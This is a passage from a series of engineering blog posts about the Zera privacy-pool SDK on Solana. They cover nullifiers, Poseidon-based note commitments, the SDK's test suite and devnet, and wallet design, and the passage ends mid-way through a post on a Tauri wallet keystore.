The marketing word is "Nullifier Generation." The implementation is six lines. The reason it sits next to Pedersen Commitments on the front page is that without it, the privacy pool is just a private deposit box you can drain twice.
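The reject mechanism above can be modeled in a few lines, with an in-memory set standing in for the per-nullifier PDAs. Names here are illustrative, not the SDK's API:

```typescript
// Toy model of the on-chain reject step. A Set stands in for the
// per-nullifier PDAs; the real program checks account existence instead.
const seenNullifiers = new Set<string>();

type SpendResult = "Accepted" | "DoubleSpendDetected";

function trySpend(nullifier: bigint): SpendResult {
  const key = nullifier.toString(16).padStart(64, "0"); // 32-byte hex, like the PDA seed
  if (seenNullifiers.has(key)) {
    // The program learns only that this nullifier exists -- not which note it was.
    return "DoubleSpendDetected";
  }
  seenNullifiers.add(key); // analogous to creating nullifier_pda(nullifier)
  return "Accepted";
}

console.log(trySpend(42n)); // Accepted
console.log(trySpend(42n)); // DoubleSpendDetected
```

The set membership check is the entire anti-double-spend logic; everything else in the protocol exists to make sure only the note's owner can produce a valid nullifier in the first place.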
## Further reading - [zeralabs.org](https://zeralabs.org) — the "Cryptographic Innovations" section names this construction. - [`packages/sdk/src/note.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/note.ts) — `computeNullifier` and friends. - [`packages/sdk/src/note.test.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/note.test.ts) — the determinism and independence tests. - [`packages/sdk/src/prover.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/prover.ts) — where the nullifier becomes a public input. - [`packages/sdk/src/pda.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/pda.ts) — the `NULLIFIER_SEED` constant and PDA derivation. - [Zcash Protocol Specification](https://zips.z.cash/protocol/protocol.pdf) — the prior art this construction is descended from. - [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) — the sibling-cryptography post. - [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/) — where these primitives first landed in the SDK monorepo. - [Why I started Zera Labs](/blog/why_i_started_zera_labs/) — the founding letter that sets up why these primitives are the line where ZK leaves the lab. --- # Pedersen commitments, in production Canonical: https://blog.skill-issue.dev/blog/pedersen_commitments_in_production/ Description: ZERA marketing says "Pedersen Commitments" on the cryptography page. The SDK ships Poseidon. Both are right — and the gap between them is the whole story of what shipping ZK in 2026 actually looks like. Published: 2026-04-01T20:36:33.000Z Tags: zera, cryptography, pedersen, poseidon, bn254, rust, zk The [ZERA Labs site](https://zeralabs.org) lists three "Cryptographic Innovations" on the front page: **Pedersen Commitments, Zero-Knowledge Proofs, Nullifier Generation.** If you read the SDK, you will not find a function called `pedersenCommit`. You will find `computeCommitment` and behind it a Poseidon hash. 
The first time someone asked me to reconcile the two, I gave a bad answer. This post is the answer I should have given.

A Pedersen commitment, in the textbook sense, is `C = a·G + b·H` where `G` and `H` are independent elliptic-curve generators, `a` is the value, and `b` is the blinding factor. The construction is **homomorphic** (add two commitments and you get a commitment to the sum of their values), **perfectly hiding** (to anyone who does not know the blinding factor, the commitment reveals nothing about the value), and **computationally binding under the discrete-log assumption**. Confidential Transactions, proposed for Bitcoin, used Pedersen commitments. So did Zcash Sapling for its value commitments. They are the canonical "I'm hiding a number" primitive in the ZK literature.

What ZERA ships is not that. What ZERA ships is a **Poseidon-based commitment** — a hash-based commitment that hides the same set of fields (`amount, asset, secret, blinding, memo[0..3]`) and is binding under the collision resistance of Poseidon. The marketing copy keeps the word "Pedersen" because that's the term of art for the *role* — a hiding, binding commitment to a confidential note. The implementation is the right primitive for the deployment target, which is Solana, which has a `sol_poseidon` syscall, which means Poseidon costs us a few thousand compute units where Pedersen would cost us hundreds of thousands.

This post walks the why, the what, and the receipts.

## What we actually wanted from "Pedersen"

Strip the construction down to the requirement. A note commitment in a shielded pool has to be:

1. **Hiding.** Given the on-chain commitment, no observer can recover the amount, secret, blinding, asset, or memo.
2. **Binding.** Once posted, the depositor cannot later "open" the commitment to a different note.
3. **Cheap inside a circuit.** The prover needs to recompute the commitment from the private inputs and assert equality with the public input. Every constraint there shows up in proving time and `.zkey` size.
4.
**Cheap on-chain.** The settlement layer recomputes hashes whenever the Merkle tree advances. If that primitive is expensive, every deposit is expensive. Pedersen on `bn254` G1 nails (1) and (2) but blows (3) and (4). Each scalar multiplication inside a Groth16 circuit is hundreds of constraints. On-chain, you'd be paying for elliptic-curve group ops on every leaf hash. Solana's compute-unit budget is generous but not infinite, and the on-chain Merkle tree is the hottest piece of state in the protocol. Poseidon flips that. It's a permutation-based hash specifically designed for ZK circuits — `x^5` S-boxes, eight full rounds, partial rounds chosen for the field. The 2-to-1 variant we use for Merkle nodes costs us *dozens* of constraints, not hundreds. And on-chain, Solana provides it as a syscall that sips compute units. The hiding/binding properties come from collision-resistance of the hash and the fresh random `blinding` factor on every note. So the engineering choice was: keep the *role* of a Pedersen commitment, swap the *primitive* for one that fits the deployment surface. Cypherpunk purity loses to compute units every time. ## The Rust core that everything else has to agree with The canonical implementation lives in [`crates/zera-core/src/note.rs`](https://github.com/Dax911/zera-sdk/blob/main/crates/zera-core/src/note.rs). The crate documentation is intentionally clinical: ```rust //! Note primitives for the ZERA shielded pool. //! //! A **Note** represents a confidential UTXO inside the pool. It carries an //! amount, asset identifier, a secret (private key material), a blinding //! factor, and an optional 4-element memo field. //! //! The note commitment is computed as: //! //! commitment = Poseidon(amount, asset, secret, blinding, memo[0..3]) //! //! The nullifier is: //! //! 
nullifier = Poseidon(secret, commitment)
```

The shape of the `Note` struct enforces the contract:

```rust
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize, BorshSerialize, BorshDeserialize)]
pub struct Note {
    /// Token amount in the smallest denomination (e.g. USDC lamports).
    pub amount: u64,
    /// Asset identifier — typically `pubkey_to_field_bytes(mint.to_bytes())`.
    pub asset: [u8; 32],
    /// Secret key material (random 32 bytes). **Must be kept private.**
    pub secret: [u8; 32],
    /// Blinding factor for the Pedersen-like commitment (random 32 bytes).
    pub blinding: [u8; 32],
    /// Optional 4-element memo field (each element 32 bytes).
    pub memo: [[u8; 32]; 4],
}
```

Two things to notice. First, the doc comment for `blinding` literally says *"Pedersen-like."* That's the gap I described in the intro, written into the source for anyone who knows enough to look. Second, the secret and the blinding are sampled separately. They serve different roles: `secret` derives the nullifier, `blinding` derives the hiding property. If they were the same value, an attacker who learned the nullifier preimage would also unmask the amount. Sampling them independently is the cheap way to keep those failure modes from chaining.

The compute function:

```rust
pub fn compute_commitment(note: &Note) -> Result<[u8; 32]> {
    let amount_fr = Fr::from(note.amount);
    let asset_fr = Fr::from_be_bytes_mod_order(&note.asset);
    let secret_fr = Fr::from_be_bytes_mod_order(&note.secret);
    let blinding_fr = Fr::from_be_bytes_mod_order(&note.blinding);
    let memo0_fr = Fr::from_be_bytes_mod_order(&note.memo[0]);
    let memo1_fr = Fr::from_be_bytes_mod_order(&note.memo[1]);
    let memo2_fr = Fr::from_be_bytes_mod_order(&note.memo[2]);
    let memo3_fr = Fr::from_be_bytes_mod_order(&note.memo[3]);

    let inputs = [
        amount_fr, asset_fr, secret_fr, blinding_fr,
        memo0_fr, memo1_fr, memo2_fr, memo3_fr,
    ];

    let h = poseidon_hash(&inputs)?;
    Ok(field_to_bytes32_be(&h))
}
```

That is the entire commitment.
Eight field elements, one Poseidon, 32 bytes out. The `Fr::from_be_bytes_mod_order` is the unglamorous load-bearing call — it reduces a 32-byte big-endian array into the BN254 scalar field by modular reduction, which is the only way to ensure the JavaScript SDK and the Rust crate agree on the byte representation of a value that might exceed the field. The Solana on-chain program does the same thing in the same direction. Get the endianness wrong and your prover and your verifier disagree silently, which is the kind of bug that costs an audit cycle.

## Why four implementations of the same hash exist

If you grep the SDK, you find Poseidon implemented (or wrapped) four times:

- `crates/zera-core/src/poseidon.rs` — Rust, via [`light-poseidon`](https://crates.io/crates/light-poseidon) `new_circom`.
- `packages/sdk/src/crypto/poseidon.ts` — TypeScript, via `circomlibjs`.
- `crates/zera-neon/` — Neon binding so Node can call the Rust core.
- The on-chain program — Solana's `sol_poseidon` syscall.

That's four entry points to the same hash function, and they all have to produce the same 32 bytes for the same inputs or the protocol falls over. The reason for the proliferation is platform: snarkjs in the browser wants a JS hash, the on-chain program wants a syscall, the Rust core wants no JS dependencies, and Node consumers benefit from native performance. The SDK's `docs/CRYPTOGRAPHY.md` enumerates the cross-validation:

> All four are verified to produce the same output for known test vectors:
>
> ```
> Poseidon(0, 0) = 14744269619966411208579211824598458697587494354926760081771325075741142829156
> Poseidon(1, 2) = 7853200120776062878684798364095072458815029376092732009249414926327459813530
> ```

Those two test vectors are the cheapest possible smoke test that the four implementations agree at the byte level. They are run in CI on every commit.
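The reduction every implementation has to agree on can be sketched in a few lines: interpret 32 bytes as a big-endian integer, then reduce mod the BN254 scalar-field prime. The constant below is the standard BN254 `Fr` modulus; the function name is illustrative, not the SDK's:

```typescript
// Sketch of the from_be_bytes_mod_order contract: big-endian fold,
// then modular reduction into the BN254 scalar field. Illustrative only.
const BN254_FR =
  21888242871839275222246405745257275088548364400416034343698204186575808495617n;

function fromBeBytesModOrder(bytes: Uint8Array): bigint {
  let acc = 0n;
  for (const b of bytes) acc = (acc << 8n) | BigInt(b); // big-endian fold
  return acc % BN254_FR; // reduce into the scalar field
}

// A 32-byte value at or above the modulus wraps around instead of
// round-tripping -- the cross-language behavior the test vectors pin down.
const allFF = new Uint8Array(32).fill(0xff);
console.log(fromBeBytesModOrder(allFF) < BN254_FR); // true
```

Both the fold direction (big-endian) and the reduction have to match bit-for-bit across all four pipelines, which is why the vectors are asserted in CI rather than assumed.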
If any of them drift — different parameter set, different endianness, different round constants — the Vitest run goes red instantly and we don't ship.

## The hiding argument, written out once

The reason a hash with a fresh random blinding factor is hiding has nothing to do with Poseidon being magical. It's the same argument that justifies any hash-based commitment. Given `H(amount, asset, secret, blinding, memo)` and the value `amount`, the attacker has to find `(secret', blinding', memo')` such that `H(amount, asset, secret', blinding', memo') == commitment`. Because Poseidon is collision-resistant and the input space of `(secret, blinding)` is `2^254 × 2^254`, this is computationally infeasible. Without `blinding`, the commitment would be enumerable for small amount spaces — an attacker could precompute `H(0, asset, ...)`, `H(1, asset, ...)`, and so on. With it, that precomputation is infeasible.

The binding argument is the dual: to "open" the commitment to a different `amount'`, the attacker has to find a Poseidon collision. This reduces to the same hardness assumption. This is the same contract the textbook Pedersen commitment provides, with a different cryptographic primitive backing it. The marketing word "Pedersen" is therefore not wrong, just collapsed. The role is identical. The construction is platform-appropriate.

## What Poseidon costs us

Poseidon is younger than SHA-256 and has received less cryptanalytic attention. The SDK's [SECURITY.md](https://github.com/Dax911/zera-sdk/blob/main/docs/SECURITY.md) is honest about this:

> Poseidon has been analyzed extensively in the academic literature. No practical attacks are known for the parameter sets used by circomlib. However, Poseidon is relatively new compared to SHA-256 and has received less cryptanalytic attention.

That's the right tone. The construction is sound, the parameter set is the one the entire ZK ecosystem uses, and the cryptanalysis pipeline is active and global.
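The enumerability point from the hiding argument can be made concrete with a toy. `toyHash` is a stand-in for Poseidon and the numbers are illustrative; the real blinding factor is a ~248-bit random field element, far outside any dictionary:

```typescript
// Toy demonstration of why the blinding factor matters: without it, a
// commitment over a small amount space can be recovered by brute force.
const toyHash = (xs: bigint[]): bigint =>
  xs.reduce((acc, x) => (acc * 131n + x) % (2n ** 61n - 1n), 7n);

// Try every small amount until the commitment matches (a dictionary attack).
function enumerateAmount(commitment: bigint, maxAmount: bigint): bigint | null {
  for (let a = 0n; a <= maxAmount; a++) {
    if (toyHash([a]) === commitment) return a;
  }
  return null;
}

// Unblinded: the amount falls out immediately.
console.log(enumerateAmount(toyHash([1337n]), 10_000n)); // 1337n

// Blinded: the same dictionary no longer matches anything.
console.log(enumerateAmount(toyHash([1337n, 123456789123456789n]), 10_000n)); // null
```

The dictionary scales with the amount space, not the blinding space, which is exactly why a fresh random blinding per note converts an enumerable commitment into a hiding one.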
But Poseidon is a hash function in motion, and we should expect adjustments — Reinforced Concrete, Rescue, the next variant — to land over the next few years. The SDK is structured so the hash function is a single Rust module and a single TypeScript module. If we ever have to migrate, it's a contained change with a clear cross-validation surface. The other thing Poseidon costs us, less obvious: it removes the homomorphic property of textbook Pedersen. You cannot add two Poseidon commitments and get a commitment to the sum. That property is what made Pedersen useful for *aggregate* confidential transactions in older protocols. ZERA does not need it, because the value-conservation check is enforced *inside the transfer circuit* (`inAmount == outAmount1 + outAmount2`), not by adding commitments outside the circuit. Different design point, different primitive. ## Why this matters for what ZERA is If you read the [Why I started Zera Labs](/blog/why_i_started_zera_labs/) letter, the founding bet is that ZK is finally fast enough, cheap enough, and verifiable enough to leave the laboratory. The "cheap enough" leg is exactly the trade-off this post describes. We do not get to ship a privacy pool to mainstream users at 1¢ per transfer if we spend 200,000 compute units per Merkle node hash. Poseidon is the engineering choice that turns ZK from a research demo into a checkout button. The ZERA Labs front page says "Pedersen Commitments" because the audience is people who want to know we have hiding/binding commitments to confidential notes. The SDK ships Poseidon because that's the implementation that makes the commitment cheap. Both are true, and the gap between them is the part of the work nobody sees. ## Further reading - [zeralabs.org](https://zeralabs.org) — Cryptographic Innovation pillar (Pedersen Commitments / Zero-Knowledge Proofs / Nullifier Generation). 
- [zera-sdk `crates/zera-core/src/note.rs`](https://github.com/Dax911/zera-sdk/blob/main/crates/zera-core/src/note.rs) — the canonical Rust implementation. - [zera-sdk `docs/CRYPTOGRAPHY.md`](https://github.com/Dax911/zera-sdk/blob/main/docs/CRYPTOGRAPHY.md) — the cross-implementation invariant spec. - [zera-sdk `docs/SECURITY.md`](https://github.com/Dax911/zera-sdk/blob/main/docs/SECURITY.md) — threat model + cryptographic assumptions. - [light-poseidon crate](https://crates.io/crates/light-poseidon) — Rust implementation we depend on. - [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/) — where the four-implementation invariant first landed. - [Why I started Zera Labs](/blog/why_i_started_zera_labs/) — the "fast enough, cheap enough" thesis. - [Building A Better Cryptocurrency](/blog/a_better_crypto/) — the privacy thesis these primitives implement. --- # 144 Tests and a Surfpool Devnet Canonical: https://blog.skill-issue.dev/blog/zera_sdk_test_suite/ Description: How the Zera SDK got from "scaffolded" to "trustable" — a 144-test Vitest suite, a Surfpool-forked devnet running on a Latitude box, and a quickstart that actually works. Published: 2026-03-31T14:40:54.000Z Tags: zera, typescript, testing, vitest, sdk, devnet, surfpool, solana > "add comprehensive test suite for sdk (144 tests)" That's [`80927`](https://github.com/Dax911/zera-sdk/commit/809274f5d2f8d3708cb09f6a353fec889994d59c), 2026-03-31. Three weeks after [the day-one scaffolding](/blog/zera_sdk_scaffolding/) shipped, the Zera SDK had 13 test files and 144 individual test cases, all passing under Vitest. Twenty-four hours after that, [`e350707`](https://github.com/Dax911/zera-sdk/commit/e350707ba47247f1ec1feac439267d11848bfde6) added a working hosted devnet, a quickstart guide, and the first end-to-end demo. This post is about the bridge between "the code exists" and "you can use it without reading the source." 
## The shape of the test suite The 13 test files mirror the SDK's 13 modules: ``` constants.test.ts crypto/keccak.test.ts crypto/poseidon.test.ts merkle-tree.test.ts note-store.test.ts note.test.ts pda.test.ts prover.test.ts tx/deposit.test.ts tx/transfer.test.ts tx/withdraw.test.ts utils.test.ts voucher.test.ts ``` The reason there's exactly one test file per source file: it's the easiest possible discipline to enforce. Open `note.ts`, see `note.test.ts`, expect coverage. Open `prover.ts`, see `prover.test.ts`, expect coverage. The moment you start putting "shared utility tests" in `helpers.test.ts`, you lose the ability to look at a file and know whether it's tested. ## A test that catches a regression I couldn't have predicted From [`merkle-tree.test.ts`](https://github.com/Dax911/zera-sdk/blob/809274f5d2f8d3708cb09f6a353fec889994d59c/packages/sdk/src/merkle-tree.test.ts): ```ts describe("MerkleTree", () => { it("initializes empty hashes correctly", async () => { const tree = await MerkleTree.create(SMALL_HEIGHT); // emptyHashes[0] should be 0 (empty leaf) expect(tree.emptyHashes[0]).toBe(0n); // emptyHashes[1] should be hash(0, 0) const expected1 = await poseidonHash2(0n, 0n); expect(tree.emptyHashes[1]).toBe(expected1); }); it("root of empty tree matches the top-level empty hash", async () => { const tree = await MerkleTree.create(SMALL_HEIGHT); let expected = 0n; for (let i = 0; i < SMALL_HEIGHT; i++) { expected = await poseidonHash2(expected, expected); } expect(tree.getRoot()).toBe(expected); }); }); ``` The "empty hashes" test is the one I'm proudest of. The empty-tree root is one of the most important invariants in a privacy pool: every fresh pool starts with this value, and the on-chain program initializes its tree to this value. If the off-chain SDK and the on-chain program disagree by a single bit, the very first deposit fails because the witness path doesn't reconcile to the root the program wrote at init. 
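The invariant those two tests pin down can be cross-checked with a stand-in 2-to-1 hash: the iterated empty-hash shortcut must equal a naive fold over all-zero leaves. `hash2` here is a toy, not Poseidon, and all names are illustrative:

```typescript
// Toy check of the empty-tree-root invariant: iterating hash(e, e) up the
// height must equal naively hashing a full tree of zero leaves.
const M = 2n ** 61n - 1n;
const hash2 = (l: bigint, r: bigint): bigint => (l * 131n + r * 137n + 7n) % M;

// Shortcut: the root of an empty height-h tree is h iterated hashes of 0.
function emptyRoot(height: number): bigint {
  let e = 0n; // an empty leaf is 0
  for (let i = 0; i < height; i++) e = hash2(e, e);
  return e;
}

// Naive version: materialize 2^height zero leaves and fold level by level.
function emptyRootNaive(height: number): bigint {
  let level: bigint[] = new Array(2 ** height).fill(0n);
  while (level.length > 1) {
    const next: bigint[] = [];
    for (let i = 0; i < level.length; i += 2) next.push(hash2(level[i], level[i + 1]));
    level = next;
  }
  return level[0];
}

console.log(emptyRoot(4) === emptyRootNaive(4)); // true
```

The equality holds because every leaf is identical, so every level is uniform; that is the algebra that lets a height-4 test stand in for the height-24 production tree.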
Without this test, that bug shows up the first time a real user tries to deposit. With this test, it shows up in CI in 220ms. ## Test height ≠ production height Note the constant at the top of the same file: ```ts const SMALL_HEIGHT = 4; ``` The production `TREE_HEIGHT = 24`. Building a tree of height 24 in tests is doable but slow — Poseidon over 16M empty-hash slots means tens of seconds per test. Height 4 is 16 leaves. The properties under test (root recomputation, leaf indexing, witness path consistency) are agnostic to height. Test the small case in milliseconds, trust the algebra to scale. ## Devnet via Surfpool The next major commit is [`e350707`](https://github.com/Dax911/zera-sdk/commit/e350707ba47247f1ec1feac439267d11848bfde6) on 2026-04-01: **`add devnet infrastructure, quickstart guide, and fix shielded pool program ID`**. This is the commit where I stopped saying "tests pass" and started saying "you can run this." The devnet is a Surfpool-forked mainnet — a 1:1 fork of Solana mainnet state with Light Protocol ZK Compression and the Zera shielded pool program deployed on top. From [`devnet/SETUP.md`](https://github.com/Dax911/zera-sdk/blob/e350707ba47247f1ec1feac439267d11848bfde6/devnet/SETUP.md): | Service | URL | Description | |---------|-----|-------------| | Solana RPC | `http://64.34.82.145:18899` | JSON-RPC (forked from mainnet) | | WebSocket | `ws://64.34.82.145:18900` | Real-time subscriptions | | Surfpool Studio | `http://64.34.82.145` | Dashboard UI (basic auth) | Why Surfpool over `solana-test-validator`? Two reasons: 1. **It forks mainnet state.** The shielded pool needs to interact with real USDC and SPL token mints. A vanilla test-validator would have me re-creating those by hand. Surfpool just snapshots them. 2. **Light Protocol's whole stack is already deployed on mainnet.** Forking gives me the real programs at the real addresses, not stubs. A Latitude box hosts the public devnet 24/7. 
Local devnets work too: ```bash cd devnet surfpool start --manifest-file-path ./txtx.yml \ --rpc-url "https://api.mainnet-beta.solana.com" ``` `txtx.yml` contains the deploy runbooks. `accounts_dump/zera_pool.json` and `zera_pool.so` are the snapshot of the on-chain pool program's state. The whole devnet boots in under 30 seconds on a fresh box. ## The bug the devnet caught The same commit message says **"fix shielded pool program ID."** That bug is the entire reason this commit exists. The SDK's `SHIELDED_POOL_PROGRAM_ID` constant in `constants.ts` was wrong — it pointed at a stale program ID from an early devnet deploy. Every transaction the SDK built was sent to a program that didn't exist anywhere. Tests pass because tests use mocked PDAs. Devnet caught it the moment a real `buildDepositTransaction` got submitted. This is the point of having a devnet at all. Unit tests will tell you that your math is consistent. They will not tell you that your program ID is wrong. Only an end-to-end submission against a real cluster catches that. ## What this taught me The test-to-deploy gap is the most expensive interval in any SDK's lifecycle. You can have 144 passing tests and still ship a constant pointing at the wrong program. The fix is not "more unit tests." The fix is one end-to-end test that submits a real transaction to a real cluster and asserts on the response. Surfpool made that possible without a public faucet, without a public RPC, without leaking devnet state to the world. The other thing this taught me: a 144-test suite for a ~3000-line SDK is roughly the right ratio. Less and you can't refactor with confidence. Much more and you're testing the language. Vitest's parallel runner means the whole suite finishes in ~2 seconds locally; CI runs it on every PR and the latency cost of a regression stays close to zero. ## Trade-offs **Why Vitest over Jest?** Native ESM, Vite-aligned config, faster start time. 
Jest's ESM story has improved but it still feels like a port. Vitest is the default if your project is already in the Vite/Bun half of the ecosystem.

**Why ship a hosted devnet at all?** Because partners and collaborators are not going to install Surfpool on day one. Giving them an HTTP endpoint that's already up is the difference between "I'll try it next week" and "I'm trying it right now."

**Why basic auth on the Studio dashboard?** Because it's a debug UI, not a public service, and exposing the validator state to anonymous internet traffic is a slow rug.

## Further reading

- [The 144-test commit](https://github.com/Dax911/zera-sdk/commit/809274f5d2f8d3708cb09f6a353fec889994d59c)
- [Devnet + quickstart commit](https://github.com/Dax911/zera-sdk/commit/e350707ba47247f1ec1feac439267d11848bfde6)
- [Surfpool documentation](https://surfpool.run)
- [Vitest](https://vitest.dev/)
- [Day-one SDK scaffolding](/blog/zera_sdk_scaffolding/) — what these tests are testing.

---

# Building the ZERA Wallet for desktop, iOS, and Android

Canonical: https://blog.skill-issue.dev/blog/zera_wallet_three_platforms/
Description: Three platforms, one shielded pool, one design system. The trade-offs of building a wallet that has to feel like cash on a phone, like a tool on a laptop, and the same on both.
Published: 2026-03-25T05:13:33.000Z
Tags: zera, wallet, react, typescript, mobile, ux

Most wallet posts start with the cryptography. This one starts with the part that is harder. The cryptography is solved. We have [Pedersen commitments](/blog/pedersen_commitments_in_production/), [nullifiers](/blog/nullifiers_without_witchcraft/), Groth16 proofs that run in human-tolerable time, and an [SDK with the right asymmetric MCP surface](/blog/mcp_server_inside_zera_sdk/).
The hard problem is the one that does not appear in any cryptography paper: **how do you make a wallet that feels like cash on a phone, like a tool on a laptop, and the same product on both?** This is the part of [Zera Wallet](https://wallet.zeralabs.org) that nobody quotes the marketing copy of. It is also the part that takes the most code. ## Three platforms is two too many — except it isn't The temptation when you launch a wallet in 2026 is to ship "mobile first" and let the desktop experience be a responsive cousin. There is a real argument for this: the median crypto user holds their assets on a phone, the offline-P2P story is a phone story (you tap two phones, you don't tap two laptops), and the mobile design constraints force discipline. We almost did that. The reason we didn't is the user we kept seeing in customer development: the *operator.* Operators are the people who run the treasury for a Zera-using business, who hold the cold-storage keys, who reconcile the books at end-of-quarter. They live on laptops. They want a wallet that gives them dense information — a real table of unspent notes, sortable, filterable, exportable to CSV. They are not an edge case; they are the customer who pays. So we ended up with the same product on three platforms with deliberately different information density: - **Mobile** — single-task, gesture-driven, big tap targets, NFC pairing for offline P2P, Face ID / biometrics gate on every send. - **Desktop** — multi-pane, keyboard-first, dense tables, hardware-key signing, multi-account view, CSV export. - **iOS / Android** — same Mobile UX, native share sheets, native NFC stack, platform-specific Secure Enclave integration. The thing that makes this tractable is that the *primitives* underneath are identical. Same shielded pool. Same SDK. Same Merkle tree. The wallet is just three different lenses over the same state. 
## The reference UX lives in `zera-wallet-demo` Before the production wallet got a single line of code, the [`zera-wallet-demo`](https://github.com/Dax911/zera-wallet-demo) repo was running. It was — and still is — the canonical reference for what the wallet should *feel* like. From [the v3 ZKP commit log](/blog/zera_wallet_v3_zkp/) it is clear we iterated on the mental model in the demo dozens of times before committing to the production shape. The demo's package.json is a fair list of the bets we made: ```json "dependencies": { "@solana/wallet-adapter-react": "^0.15.35", "@solana/wallet-adapter-react-ui": "^0.9.35", "@solana/web3.js": "^1.98.0", "framer-motion": "^11.11.17", "lucide-react": "^0.468.0", "react": "^19.0.0", "react-router-dom": "^7.1.0", "sonner": "^1.7.1", "tailwind-merge": "^2.6.0", "zeraswap-sdk": "workspace:*" } ``` A few of those choices deserve specific defence. ### React 19 was not the easy call React 19 was barely a year old when we started, and the wallet ecosystem on Solana is full of libraries that were tested against React 17 and 18 and quietly assume hooks behave a specific way. We took the upgrade hit because the Server Components story changes how we think about *this is sensitive data, do not render it client-side* — even though we mostly use it from the client side, the discipline of marking which components touch keys and which do not made the security model cleaner. ### `framer-motion` for trust signals You do not normally find a high-end animation library in a wallet codebase. We use it for one specific thing: the "send confirmed" state. The transition between *"you have authorised this send"* and *"this send is final on chain"* is a moment of maximum user anxiety. A jarring instant flip from a button to a checkmark looks like the app glitched. A 350ms eased fade-in with the prior state visible underneath, settling into a green check, looks like the app is doing something. 
The animation is the *trust signal.* `framer-motion` makes that easy to ship and impossible to do badly. We honour `prefers-reduced-motion` everywhere. The animation is decoration, not load-bearing. ### `sonner` for toasts Most toast libraries on React are ugly or overengineered. `sonner` is what happens when someone with taste shipped a toast library and called it done. The fact that it stacks gracefully and gets out of the way is the entire pitch. ### `lucide-react` for icons, no exceptions Across the entire Zera codebase — wallet, SDK, [zera-med](/blog/zera_med_zk_fhir/), [zeraswap](/blog/zeraswap_compressed_amm/), even [this blog](/blog/why_i_started_zera_labs/) — every single icon is from Lucide. One pack, one stroke weight, one optical alignment. This is the kind of decision that costs nothing to make in week one and is impossible to retrofit in year two. ## The mobile drawer, ported You can see the design language travel between repos in the [responsive HUD work on `zera_med_demo`](/blog/zera_med_responsive_hud/) — the mobile drawer that ships in `zera-wallet-demo` is the same component, give or take a tag, that we shipped in the medical-records demo two months earlier. That is what a design system is *for.* Not the Tailwind tokens, not the icon pack, but the muscle memory of "we have already solved 'phone with a sidebar that needs to also work on desktop.'" ## What the production wallet adds The demo is the lab. The production wallet adds three things the demo deliberately does not: 1. **Hardware-key signing** — Ledger and (TODO: Dax confirm — Trezor support is in progress) — for the operator desktop case. The demo signs entirely in the browser; the production app refuses to broadcast a transaction whose proof was constructed without a hardware-signed approval. 2. **Native iOS / Android shells** — TODO: Dax confirm exact framework choice (Tauri vs. React Native vs. native). 
The demo runs in a browser; the production app needs Secure Enclave access and the platform NFC stack, which means a real native shell. 3. **Compliance hooks** — for the venues that need them. ZERA is token-agnostic and venue-flexible. The wallet has a clean integration point for permissioned KYC layers without making them mandatory for the protocol. Reasonable people can disagree about how much compliance belongs at the wallet edge; we ship the surface and let the customer choose. ## The question I get asked the most > *Why a wallet at all? Isn't ZERA an SDK story?* The SDK is for developers. The wallet is for everyone else. **You cannot ship privacy as a primitive that only protocol engineers can integrate.** If we want a unified shielded pool to be the default for stablecoin transfers in 2027, the on-ramp has to be a wallet you can hand to your accountant, your sister, and an autonomous AI agent — and it has to feel obvious to all three. The wallet is the product. The SDK is the *contract.* ## Further reading - [zera-wallet-demo on GitHub](https://github.com/Dax911/zera-wallet-demo) — the reference UX - [wallet.zeralabs.org](https://wallet.zeralabs.org) — production landing - [Zera Wallet v3 ZKP](/blog/zera_wallet_v3_zkp/) — the commit log - [The MCP server inside zera-sdk](/blog/mcp_server_inside_zera_sdk/) - [A Privacy Demo That Works on a Phone](/blog/zera_med_responsive_hud/) — sibling design work - Solana Foundation, *Wallet Standard* — the React-side wallet-adapter contract --- # Zera Wallet v3: ZK Proofs in a Tauri Webview Canonical: https://blog.skill-issue.dev/blog/zera_wallet_v3_zkp/ Description: A Tauri 2 desktop wallet that proves Groth16 in the browser, persists encrypted notes locally, talks NFC to physical bearer cards, and never lets the private key out of Rust. Published: 2026-03-24T15:45:10.000Z Tags: zera, wallet, tauri, rust, react, zk, groth16, nfc The Zera SDK is the engine. The wallet is the car. 
Three weeks after the SDK shipped, I started building the v3 desktop wallet — Tauri 2 + React 18, with a Rust keystore that never lets the seed touch JavaScript and a webview that runs Groth16 provers in WebAssembly. The initial commit is [`39b5518`](https://github.com/Dax911/zera-wallet-demo/commit/39b55182b349da8896cd841dad753bb162ddcc48) on 2026-03-24. The follow-up — the one that made the wallet actually do anything — is [`660283f` — `ZKP core, real data layer, wallet unlock, note scanning`](https://github.com/Dax911/zera-wallet-demo/commit/660283fe9a16d7f1a471cdf06542f5592bf8ba9f) the same day. The third commit, [`d061813`](https://github.com/Dax911/zera-wallet-demo/commit/d061813aa98d83aa7dfcb59f0a7ce7c5ef3993d2) on 2026-03-25, added P2P send + NFC bearer cards. Three commits, ~3000 lines of meaningful code, full privacy stack. This post is about what's load-bearing in those three commits. ## The trust model: Rust holds the key The hardest design decision in any Tauri wallet is *where the private key lives*. The naive thing is to load it into JavaScript, sign in JS, send. The naive thing leaks the key the first time anything in the JS supply chain ([Rusty Pipes](/blog/rusty_pipes/), say) gets compromised. The right thing is `keystore.rs`: ```rust // src-tauri/src/keystore.rs #[derive(Debug, Clone, Serialize, Deserialize)] pub struct WalletFile { pub version: u32, pub salt: String, // Argon2 salt, hex pub nonce: String, // ChaCha20 nonce, hex pub ciphertext: String, // Encrypted payload (JSON: { seed, entropy }) pub pubkey: String, // base58, unencrypted for display before unlock } struct WalletPayload { seed: String, // 64-byte BIP39 seed for mnemonic, 32-byte raw key otherwise entropy: String, // 16-byte entropy for 12-word recovery key_type: String, // "mnemonic" or "raw_key" } ``` The seed lives in `$APPDATA/zera/wallet.enc`, encrypted with ChaCha20-Poly1305 under a key derived from the user's password via Argon2id. 
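The wallet-file shape above can be sketched end to end with Node's stdlib. This is an illustration of the flow, not the production Rust path: field names mirror `WalletFile`, and scrypt stands in for Argon2id, which the Node stdlib doesn't ship:

```typescript
import { scryptSync, randomBytes, createCipheriv, createDecipheriv } from "node:crypto";

// Derive a 32-byte key from the password. The real keystore uses Argon2id;
// scrypt is the stdlib stand-in here.
function deriveKey(password: string, salt: Buffer): Buffer {
  return scryptSync(password, salt, 32);
}

function encryptSeed(seed: Buffer, password: string) {
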